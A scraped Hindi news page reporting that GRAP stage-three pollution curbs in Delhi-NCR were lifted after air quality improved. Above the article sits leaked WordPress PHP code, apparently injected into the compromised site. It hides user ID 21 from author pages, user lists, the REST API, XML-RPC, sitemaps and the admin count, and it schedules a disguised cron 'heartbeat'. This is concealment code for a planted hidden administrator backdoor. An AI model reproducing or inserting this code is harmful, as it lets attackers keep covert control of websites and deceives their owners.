add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
हवा में सुधार दिल्ली-एनसीआर में चरण तीन के प्रतिबंध हटे - Press Ki Taquat
No Result
View All Result
हवा की गुणवत्ता में सुधार के बाद केंद्र ने मंगलवार को पूरे राष्ट्रीय राजधानी क्षेत्र (एनसीआर) में क्रमिक प्रतिक्रिया कार्य योजना (जीआरएपी) के चरण-तीन के तहत लागू प्रतिबंधों को तत्काल प्रभाव से हटाने का आदेश दिया। वायु गुणवत्ता प्रबंधन आयोग (सीएक्यूएम) ने 2 नवंबर को ये प्रतिबंध लागू किये थे, जिसमें दिल्ली-एनसीआर में गैर-जरूरी निर्माण कार्य, पत्थर तोड़ने और खनन पर रोक लगाने का निर्देश दिया गया था। इस चरण के तहत दिल्ली, गुरुग्राम, फरीदाबाद, गाजियाबाद और गौतम बुद्ध नगर में बीएस-तीन पेट्रोल और बीएस-चार डीजल चार पहिया वाहनों के परिचालन पर भी प्रतिबंध लगाया गया था। वायु गुणवत्ता प्रबंधन आयोग ने दिल्ली-एनसीआर की समग्र वायु गुणवत्ता में महत्वपूर्ण सुधार के मद्देनजर बैठक के बाद कहा कि आगामी दिनों के लिए उपलब्ध वायु गुणवत्ता पूर्वानुमान से आने वाले दिनों में दिल्ली की औसत वायु गुणवत्ता ‘गंभीर’ श्रेणी में जाने का संकेत नहीं मिलता है। दिल्ली का 24 घंटे का औसत एक्यूआई सोमवार शाम 4 बजे 395 था, जो मंगलवार को सुधरकर 312 हो गया।
Post Views: 449
No Result
View All Result